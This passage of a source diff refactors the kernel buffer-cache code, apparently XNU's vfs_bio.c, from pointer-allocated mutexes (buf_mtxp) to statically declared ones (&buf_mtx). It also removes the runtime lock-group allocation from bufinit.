        if (ds_bp == NULL) {
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                buf_free_meta_store(&my_buf);
 
@@ -991,7 +1005,7 @@ buf_make_private(buf_t bp)
        bp->b_data_ref = 0;
        bp->b_datap = my_buf.b_datap;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        KERNEL_DEBUG(0xbbbbc004 | DBG_FUNC_END, bp, bp->b_shadow_ref, 0, 0, 0);
        return 0;
@@ -1529,10 +1543,10 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg)
        }
 
        for (i = 0; i < num_lists; i++) {
-               lck_mtx_lock(buf_mtxp);
+               lck_mtx_lock(&buf_mtx);
 
                if (buf_iterprepare(vp, &local_iterblkhd, list[i].flag)) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                        continue;
                }
                while (!LIST_EMPTY(&local_iterblkhd)) {
@@ -1548,7 +1562,7 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg)
                                }
                        }
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        retval = callout(bp, arg);
 
@@ -1564,17 +1578,17 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg)
                                if (bp) {
                                        buf_brelse(bp);
                                }
-                               lck_mtx_lock(buf_mtxp);
+                               lck_mtx_lock(&buf_mtx);
                                goto out;
                        case BUF_CLAIMED_DONE:
-                               lck_mtx_lock(buf_mtxp);
+                               lck_mtx_lock(&buf_mtx);
                                goto out;
                        }
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
                } /* while list has more nodes */
 out:
                buf_itercomplete(vp, &local_iterblkhd, list[i].flag);
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
        } /* for each list */
 } /* buf_iterate */
 
@@ -1596,7 +1610,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                return 0;
        }
 
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        for (;;) {
                if (must_rescan == 0) {
@@ -1604,8 +1618,8 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                         * the lists may not be empty, but all that's left at this
                         * point are metadata or B_LOCKED buffers which are being
                         * skipped... we know this because we made it through both
-                        * the clean and dirty lists without dropping buf_mtxp...
-                        * each time we drop buf_mtxp we bump "must_rescan"
+                        * the clean and dirty lists without dropping buf_mtx...
+                        * each time we drop buf_mtx we bump "must_rescan"
                         */
                        break;
                }
@@ -1642,7 +1656,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                                if (error == EDEADLK) {
                                        /*
                                         * this buffer was marked B_LOCKED...
-                                        * we didn't drop buf_mtxp, so we
+                                        * we didn't drop buf_mtx, so we
                                         * we don't need to rescan
                                         */
                                        continue;
@@ -1650,7 +1664,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                                if (error == EAGAIN) {
                                        /*
                                         * found a busy buffer... we blocked and
-                                        * dropped buf_mtxp, so we're going to
+                                        * dropped buf_mtx, so we're going to
                                         * need to rescan after this pass is completed
                                         */
                                        must_rescan++;
@@ -1662,10 +1676,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                                 */
                                buf_itercomplete(vp, &local_iterblkhd, VBI_CLEAN);
 
-                               lck_mtx_unlock(buf_mtxp);
+                               lck_mtx_unlock(&buf_mtx);
                                return error;
                        }
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        if (bp->b_flags & B_LOCKED) {
                                KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 0, 0);
@@ -1675,10 +1689,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                        SET(bp->b_flags, B_INVAL);
                        buf_brelse(bp);
 
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
 
                        /*
-                        * by dropping buf_mtxp, we allow new
+                        * by dropping buf_mtx, we allow new
                         * buffers to be added to the vnode list(s)
                         * we'll have to rescan at least once more
                         * if the queues aren't empty
@@ -1717,7 +1731,7 @@ try_dirty_list:
                                if (error == EDEADLK) {
                                        /*
                                         * this buffer was marked B_LOCKED...
-                                        * we didn't drop buf_mtxp, so we
+                                        * we didn't drop buf_mtx, so we
                                         * we don't need to rescan
                                         */
                                        continue;
@@ -1725,7 +1739,7 @@ try_dirty_list:
                                if (error == EAGAIN) {
                                        /*
                                         * found a busy buffer... we blocked and
-                                        * dropped buf_mtxp, so we're going to
+                                        * dropped buf_mtx, so we're going to
                                         * need to rescan after this pass is completed
                                         */
                                        must_rescan++;
@@ -1737,10 +1751,10 @@ try_dirty_list:
                                 */
                                buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY);
 
-                               lck_mtx_unlock(buf_mtxp);
+                               lck_mtx_unlock(&buf_mtx);
                                return error;
                        }
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        if (bp->b_flags & B_LOCKED) {
                                KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 1, 0);
@@ -1755,9 +1769,9 @@ try_dirty_list:
                                buf_brelse(bp);
                        }
 
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
                        /*
-                        * by dropping buf_mtxp, we allow new
+                        * by dropping buf_mtx, we allow new
                         * buffers to be added to the vnode list(s)
                         * we'll have to rescan at least once more
                         * if the queues aren't empty
@@ -1766,7 +1780,7 @@ try_dirty_list:
                }
                buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY);
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return 0;
 }
@@ -1796,7 +1810,7 @@ buf_flushdirtyblks_skipinfo(vnode_t vp, int wait, int flags, const char *msg)
                lock_flags |= BAC_SKIP_NONLOCKED;
        }
 loop:
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        if (buf_iterprepare(vp, &local_iterblkhd, VBI_DIRTY) == 0) {
                while (!LIST_EMPTY(&local_iterblkhd)) {
@@ -1823,7 +1837,7 @@ loop:
                                }
                                continue;
                        }
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        bp->b_flags &= ~B_LOCKED;
 
@@ -1838,11 +1852,11 @@ loop:
                        }
                        writes_issued++;
 
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
                }
                buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY);
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (wait) {
                (void)vnode_waitforwrites(vp, 0, 0, 0, msg);
@@ -1875,7 +1889,7 @@ loop:
 
 
 /*
- * called with buf_mtxp held...
+ * called with buf_mtx held...
  * this lock protects the queue manipulation
  */
 static int
@@ -1891,7 +1905,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags)
 
        while (vp->v_iterblkflags & VBI_ITER) {
                vp->v_iterblkflags |= VBI_ITERWANT;
-               msleep(&vp->v_iterblkflags, buf_mtxp, 0, "buf_iterprepare", NULL);
+               msleep(&vp->v_iterblkflags, &buf_mtx, 0, "buf_iterprepare", NULL);
        }
        if (LIST_EMPTY(listheadp)) {
                LIST_INIT(iterheadp);
@@ -1907,7 +1921,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags)
 }
 
 /*
- * called with buf_mtxp held...
+ * called with buf_mtx held...
  * this lock protects the queue manipulation
  */
 static void
@@ -1982,7 +1996,7 @@ bremfree_locked(buf_t bp)
 
 /*
  * Associate a buffer with a vnode.
- * buf_mtxp must be locked on entry
+ * buf_mtx must be locked on entry
  */
 static void
 bgetvp_locked(vnode_t vp, buf_t bp)
@@ -2004,7 +2018,7 @@ bgetvp_locked(vnode_t vp, buf_t bp)
 
 /*
  * Disassociate a buffer from a vnode.
- * buf_mtxp must be locked on entry
+ * buf_mtx must be locked on entry
  */
 static void
 brelvp_locked(buf_t bp)
@@ -2033,7 +2047,7 @@ buf_reassign(buf_t bp, vnode_t newvp)
                printf("buf_reassign: NULL");
                return;
        }
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        /*
         * Delete from old vnode list, if on one.
@@ -2052,7 +2066,7 @@ buf_reassign(buf_t bp, vnode_t newvp)
        }
        bufinsvn(bp, listheadp);
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 }
 
 static __inline__ void
@@ -2112,36 +2126,6 @@ bufinit(void)
                binsheadfree(bp, &iobufqueue, -1);
        }
 
-       /*
-        * allocate lock group attribute and group
-        */
-       buf_mtx_grp_attr = lck_grp_attr_alloc_init();
-       buf_mtx_grp = lck_grp_alloc_init("buffer cache", buf_mtx_grp_attr);
-
-       /*
-        * allocate the lock attribute
-        */
-       buf_mtx_attr = lck_attr_alloc_init();
-
-       /*
-        * allocate and initialize mutex's for the buffer and iobuffer pools
-        */
-       buf_mtxp        = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr);
-       iobuffer_mtxp   = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr);
-       buf_gc_callout  = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr);
-
-       if (iobuffer_mtxp == NULL) {
-               panic("couldn't create iobuffer mutex");
-       }
-
-       if (buf_mtxp == NULL) {
-               panic("couldn't create buf mutex");
-       }
-
-       if (buf_gc_callout == NULL) {
-               panic("couldn't create buf_gc_callout mutex");
-       }
-
        /*
         * allocate and initialize cluster specific global locks...
         */
@@ -2540,7 +2524,7 @@ buf_brelse_shadow(buf_t bp)
 #endif
        int need_wakeup = 0;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        __IGNORE_WCASTALIGN(bp_head = (buf_t)bp->b_orig);
 
@@ -2619,7 +2603,7 @@ buf_brelse_shadow(buf_t bp)
                        need_wakeup = 1;
                }
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (need_wakeup) {
                wakeup(bp_head);
@@ -2809,21 +2793,21 @@ buf_brelse(buf_t bp)
                 */
                buf_release_credentials(bp);
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                if (bp->b_shadow_ref) {
                        SET(bp->b_lflags, BL_WAITSHADOW);
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        return;
                }
                if (delayed_buf_free_meta_store == TRUE) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 finish_shadow_master:
                        buf_free_meta_store(bp);
 
-                       lck_mtx_lock_spin(buf_mtxp);
+                       lck_mtx_lock_spin(&buf_mtx);
                }
                CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA));
 
@@ -2855,12 +2839,12 @@ finish_shadow_master:
 
                bp->b_timestamp = buf_timestamp();
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                /*
                 * the buf_brelse_shadow routine doesn't take 'ownership'
                 * of the parent buf_t... it updates state that is protected by
-                * the buf_mtxp, and checks for BL_BUSY to determine whether to
+                * the buf_mtx, and checks for BL_BUSY to determine whether to
                 * put the buf_t back on a free list.  b_shadow_ref is protected
                 * by the lock, and since we have not yet cleared B_BUSY, we need
                 * to check it while holding the lock to insure that one of us
@@ -2883,9 +2867,9 @@ finish_shadow_master:
        if (needbuffer) {
                /*
                 * needbuffer is a global
-                * we're currently using buf_mtxp to protect it
+                * we're currently using buf_mtx to protect it
                 * delay doing the actual wakeup until after
-                * we drop buf_mtxp
+                * we drop buf_mtx
                 */
                needbuffer = 0;
                need_wakeup = 1;
@@ -2893,7 +2877,7 @@ finish_shadow_master:
        if (ISSET(bp->b_lflags, BL_WANTED)) {
                /*
                 * delay the actual wakeup until after we
-                * clear BL_BUSY and we've dropped buf_mtxp
+                * clear BL_BUSY and we've dropped buf_mtx
                 */
                need_bp_wakeup = 1;
        }
@@ -2903,7 +2887,7 @@ finish_shadow_master:
        CLR(bp->b_lflags, (BL_BUSY | BL_WANTED));
        buf_busycount--;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (need_wakeup) {
                /*
@@ -2936,14 +2920,14 @@ incore(vnode_t vp, daddr64_t blkno)
 
        dp = BUFHASH(vp, blkno);
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if (incore_locked(vp, blkno, dp)) {
                retval = TRUE;
        } else {
                retval = FALSE;
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return retval;
 }
@@ -2973,7 +2957,7 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno)
 
        dp = BUFHASH(vp, blkno);
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        for (;;) {
                if ((bp = incore_locked(vp, blkno, dp)) == NULL) {
@@ -2986,9 +2970,9 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno)
 
                SET(bp->b_lflags, BL_WANTED_REF);
 
-               (void) msleep(bp, buf_mtxp, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL);
+               (void) msleep(bp, &buf_mtx, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL);
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 }
 
 /* XXX FIXME -- Update the comment to reflect the UBC changes (please) -- */
@@ -3020,7 +3004,7 @@ buf_getblk(vnode_t vp, daddr64_t blkno, int size, int slpflag, int slptimeo, int
        operation &= ~BLK_ONLYVALID;
        dp = BUFHASH(vp, blkno);
 start:
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if ((bp = incore_locked(vp, blkno, dp))) {
                /*
@@ -3047,7 +3031,7 @@ start:
                                KERNEL_DEBUG((FSDBG_CODE(DBG_FSRW, 396)) | DBG_FUNC_NONE,
                                    (uintptr_t)blkno, size, operation, 0, 0);
 
-                               err = msleep(bp, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts);
+                               err = msleep(bp, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts);
 
                                /*
                                 * Callers who call with PCATCH or timeout are
@@ -3080,7 +3064,7 @@ start:
                        bremfree_locked(bp);
                        bufstats.bufs_incore++;
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 #ifdef JOE_DEBUG
                        bp->b_owner = current_thread();
                        bp->b_tag   = 1;
@@ -3191,7 +3175,7 @@ start:
                int queue = BQ_EMPTY; /* Start with no preference */
 
                if (ret_only_valid) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                        return NULL;
                }
                if ((vnode_isreg(vp) == 0) || (UBCINFOEXISTS(vp) == 0) /*|| (vnode_issystem(vp) == 1)*/) {
@@ -3213,7 +3197,7 @@ start:
                        SET(bp->b_flags, B_INVAL);
                        binshash(bp, &invalhash);
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        buf_brelse(bp);
                        goto start;
@@ -3241,7 +3225,7 @@ start:
 
                bgetvp_locked(vp, bp);
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                allocbuf(bp, size);
 
@@ -3251,11 +3235,11 @@ start:
                        /*
                         * buffer data is invalid...
                         *
-                        * I don't want to have to retake buf_mtxp,
+                        * I don't want to have to retake buf_mtx,
                         * so the miss and vmhits counters are done
                         * with Atomic updates... all other counters
                         * in bufstats are protected with either
-                        * buf_mtxp or iobuffer_mtxp
+                        * buf_mtx or iobuffer_mtxp
                         */
                        OSAddAtomicLong(1, &bufstats.bufs_miss);
                        break;
@@ -3391,7 +3375,7 @@ buf_geteblk(int size)
        int queue = BQ_EMPTY;
 
        do {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                bp = getnewbuf(0, 0, &queue);
        } while (bp == NULL);
@@ -3406,7 +3390,7 @@ buf_geteblk(int size)
        binshash(bp, &invalhash);
        bufstats.bufs_eblk++;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        allocbuf(bp, size);
 
@@ -3439,7 +3423,7 @@ recycle_buf_from_pool(int nsize)
        buf_t   bp;
        void    *ptr = NULL;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        TAILQ_FOREACH(bp, &bufqueues[BQ_META], b_freelist) {
                if (ISSET(bp->b_flags, B_DELWRI) || bp->b_bufsize != (uint32_t)nsize) {
@@ -3451,7 +3435,7 @@ recycle_buf_from_pool(int nsize)
                bcleanbuf(bp, TRUE);
                break;
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return ptr;
 }
@@ -3607,9 +3591,9 @@ allocbuf(buf_t bp, int size)
  *     Remove the buffer from the hash. Return the buffer and the queue
  *     on which it was found.
  *
- *     buf_mtxp is held upon entry
- *     returns with buf_mtxp locked if new buf available
- *     returns with buf_mtxp UNlocked if new buf NOT available
+ *     buf_mtx is held upon entry
+ *     returns with buf_mtx locked if new buf available
+ *     returns with buf_mtx UNlocked if new buf NOT available
  */
 
 static buf_t
@@ -3677,7 +3661,7 @@ start:
                 */
 
 add_newbufs:
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                /* Create a new temporary buffer header */
                bp = (struct buf *)zalloc(buf_hdr_zone);
@@ -3690,7 +3674,7 @@ add_newbufs:
                        SET(bp->b_flags, B_HDRALLOC);
                        *queue = BQ_EMPTY;
                }
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                if (bp) {
                        binshash(bp, &invalhash);
@@ -3710,7 +3694,7 @@ add_newbufs:
                /* the hz value is 100; which leads to 10ms */
                ts.tv_nsec = (slptimeo % 1000) * NSEC_PER_USEC * 1000 * 10;
 
-               msleep(&needbuffer, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts);
+               msleep(&needbuffer, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts);
                return NULL;
        }
 
@@ -3793,8 +3777,8 @@ found:
  * Returns 1 if issued a buf_bawrite() to indicate
  * that the buffer is not ready.
  *
- * buf_mtxp is held upon entry
- * returns with buf_mtxp locked
+ * buf_mtx is held upon entry
+ * returns with buf_mtx locked
  */
 int
 bcleanbuf(buf_t bp, boolean_t discard)
@@ -3817,7 +3801,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
 
                bmovelaundry(bp);
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                wakeup(&bufqueues[BQ_LAUNDRY]);
                /*
@@ -3825,7 +3809,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
                 */
                (void)thread_block(THREAD_CONTINUE_NULL);
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                return 1;
        }
@@ -3848,7 +3832,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
                brelvp_locked(bp);
        }
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        BLISTNONE(bp);
 
@@ -3862,7 +3846,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
 
        /* If discarding, just move to the empty queue */
        if (discard) {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
                CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA));
                bp->b_whichq = BQ_EMPTY;
                binshash(bp, &invalhash);
@@ -3898,7 +3882,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
                bp->b_validoff = bp->b_validend = 0;
                bzero(&bp->b_attr, sizeof(struct bufattr));
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
        }
        return 0;
 }
@@ -3915,20 +3899,20 @@ buf_invalblkno(vnode_t vp, daddr64_t lblkno, int flags)
        dp = BUFHASH(vp, lblkno);
 
 relook:
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if ((bp = incore_locked(vp, lblkno, dp)) == (struct buf *)0) {
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
                return 0;
        }
        if (ISSET(bp->b_lflags, BL_BUSY)) {
                if (!ISSET(flags, BUF_WAIT)) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                        return EBUSY;
                }
                SET(bp->b_lflags, BL_WANTED);
 
-               error = msleep((caddr_t)bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL);
+               error = msleep((caddr_t)bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL);
 
                if (error) {
                        return error;
@@ -3943,7 +3927,7 @@ relook:
        bp->b_owner = current_thread();
        bp->b_tag   = 4;
 #endif
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
        buf_brelse(bp);
 
        return 0;
@@ -3955,12 +3939,12 @@ buf_drop(buf_t bp)
 {
        int need_wakeup = 0;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if (ISSET(bp->b_lflags, BL_WANTED)) {
                /*
                 * delay the actual wakeup until after we
-                * clear BL_BUSY and we've dropped buf_mtxp
+                * clear BL_BUSY and we've dropped buf_mtx
                 */
                need_wakeup = 1;
        }
@@ -3974,7 +3958,7 @@ buf_drop(buf_t bp)
        CLR(bp->b_lflags, (BL_BUSY | BL_WANTED));
        buf_busycount--;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (need_wakeup) {
                /*
@@ -3990,11 +3974,11 @@ buf_acquire(buf_t bp, int flags, int slpflag, int slptimeo)
 {
        errno_t error;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        error = buf_acquire_locked(bp, flags, slpflag, slptimeo);
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return error;
 }
@@ -4029,7 +4013,7 @@ buf_acquire_locked(buf_t bp, int flags, int slpflag, int slptimeo)
                /* the hz value is 100; which leads to 10ms */
                ts.tv_sec = (slptimeo / 100);
                ts.tv_nsec = (slptimeo % 100) * 10  * NSEC_PER_USEC * 1000;
-               error = msleep((caddr_t)bp, buf_mtxp, slpflag | (PRIBIO + 1), "buf_acquire", &ts);
+               error = msleep((caddr_t)bp, &buf_mtx, slpflag | (PRIBIO + 1), "buf_acquire", &ts);
 
                if (error) {
                        return error;
@@ -4058,14 +4042,14 @@ errno_t
 buf_biowait(buf_t bp)
 {
        while (!ISSET(bp->b_flags, B_DONE)) {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                if (!ISSET(bp->b_flags, B_DONE)) {
                        DTRACE_IO1(wait__start, buf_t, bp);
-                       (void) msleep(bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_biowait", NULL);
+                       (void) msleep(bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_biowait", NULL);
                        DTRACE_IO1(wait__done, buf_t, bp);
                } else {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                }
        }
        /* check for interruption of I/O (e.g. via NFS), then errors. */
@@ -4259,12 +4243,12 @@ buf_biodone(buf_t bp)
                 * they do get to run, their going to re-set
                 * BL_WANTED and go back to sleep
                 */
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                CLR(bp->b_lflags, BL_WANTED);
                SET(bp->b_flags, B_DONE);               /* note that it's done */
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                wakeup(bp);
        }
@@ -4295,13 +4279,13 @@ count_lock_queue(void)
        buf_t   bp;
        int     n = 0;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        for (bp = bufqueues[BQ_LOCKED].tqh_first; bp;
            bp = bp->b_freelist.tqe_next) {
                n++;
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return n;
 }
@@ -4338,13 +4322,13 @@ vfs_bufstats()
                        counts[j] = 0;
                }
 
-               lck_mtx_lock(buf_mtxp);
+               lck_mtx_lock(&buf_mtx);
 
                for (bp = dp->tqh_first; bp; bp = bp->b_freelist.tqe_next) {
                        counts[bp->b_bufsize / CLBYTES]++;
                        count++;
                }
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                printf("%s: total-%d", bname[i], count);
                for (j = 0; j <= MAXBSIZE / CLBYTES; j++) {
@@ -4369,7 +4353,7 @@ alloc_io_buf(vnode_t vp, int priv)
        mount_t mp = NULL;
        int alloc_for_virtualdev = FALSE;
 
-       lck_mtx_lock_spin(iobuffer_mtxp);
+       lck_mtx_lock_spin(&iobuffer_mtxp);
 
        /*
         * We subject iobuf requests for diskimages to additional restrictions.
@@ -4388,7 +4372,7 @@ alloc_io_buf(vnode_t vp, int priv)
                        bufstats.bufs_iobufsleeps++;
 
                        need_iobuffer = 1;
-                       (void)msleep(&need_iobuffer, iobuffer_mtxp,
+                       (void)msleep(&need_iobuffer, &iobuffer_mtxp,
                            PSPIN | (PRIBIO + 1), (const char *)"alloc_io_buf (1)",
                            NULL);
                }
@@ -4399,7 +4383,7 @@ alloc_io_buf(vnode_t vp, int priv)
                bufstats.bufs_iobufsleeps++;
 
                need_iobuffer = 1;
-               (void)msleep(&need_iobuffer, iobuffer_mtxp, PSPIN | (PRIBIO + 1),
+               (void)msleep(&need_iobuffer, &iobuffer_mtxp, PSPIN | (PRIBIO + 1),
                    (const char *)"alloc_io_buf (2)", NULL);
        }
        TAILQ_REMOVE(&iobufqueue, bp, b_freelist);
@@ -4414,7 +4398,7 @@ alloc_io_buf(vnode_t vp, int priv)
                bufstats.bufs_iobufinuse_vdev++;
        }
 
-       lck_mtx_unlock(iobuffer_mtxp);
+       lck_mtx_unlock(&iobuffer_mtxp);
 
        /*
         * initialize various fields
@@ -4481,7 +4465,7 @@ free_io_buf(buf_t bp)
        /* Zero out the bufattr and its flags before relinquishing this iobuf */
        bzero(&bp->b_attr, sizeof(struct bufattr));
 
-       lck_mtx_lock_spin(iobuffer_mtxp);
+       lck_mtx_lock_spin(&iobuffer_mtxp);
 
        binsheadfree(bp, &iobufqueue, -1);
 
@@ -4511,7 +4495,7 @@ free_io_buf(buf_t bp)
                }
        }
 
-       lck_mtx_unlock(iobuffer_mtxp);
+       lck_mtx_unlock(&iobuffer_mtxp);
 
        if (need_wakeup) {
                wakeup(&need_iobuffer);
@@ -4522,13 +4506,13 @@ free_io_buf(buf_t bp)
 void
 buf_list_lock(void)
 {
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 }
 
 void
 buf_list_unlock(void)
 {
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 }
 
 /*
@@ -4559,10 +4543,10 @@ bcleanbuf_thread(void)
        int loopcnt = 0;
 
        for (;;) {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                while ((bp = TAILQ_FIRST(&bufqueues[BQ_LAUNDRY])) == NULL) {
-                       (void)msleep0(&bufqueues[BQ_LAUNDRY], buf_mtxp, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread);
+                       (void)msleep0(&bufqueues[BQ_LAUNDRY], &buf_mtx, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread);
                }
 
                /*
@@ -4581,7 +4565,7 @@ bcleanbuf_thread(void)
                bp->b_tag   = 10;
 #endif
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
                /*
                 * do the IO
                 */
@@ -4591,7 +4575,7 @@ bcleanbuf_thread(void)
                        bp->b_whichq = BQ_LAUNDRY;
                        bp->b_timestamp = buf_timestamp();
 
-                       lck_mtx_lock_spin(buf_mtxp);
+                       lck_mtx_lock_spin(&buf_mtx);
 
                        binstailfree(bp, &bufqueues[BQ_LAUNDRY], BQ_LAUNDRY);
                        blaundrycnt++;
@@ -4604,7 +4588,7 @@ bcleanbuf_thread(void)
                        bp->b_tag   = 11;
 #endif
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        if (loopcnt > MAXLAUNDRY) {
                                /*
@@ -4686,24 +4670,24 @@ dump_buffer:
 int
